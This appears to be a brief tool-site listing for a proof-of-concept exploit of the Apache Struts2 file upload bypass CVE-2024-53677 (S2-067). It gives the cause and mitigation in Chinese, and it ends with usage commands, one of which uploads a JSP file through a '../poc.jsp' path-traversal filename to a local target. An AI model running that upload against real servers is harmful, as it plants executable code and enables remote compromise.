黑客、渗透测试和网络安全工具,武装您的安全武器库!
Proof-of-concept exploit for CVE-2024-53677 (S2-067), an Apache Struts2 file upload logic bypass enabling remote code execution via crafted filename parameters.
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/
1.对危险类型后缀名无限制 2.上传文件时从上传参数中获取文件名 因此缓释修复也很简单,限制后缀名、使用自定义随机文件名称等
python3 s2-067.py -h
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s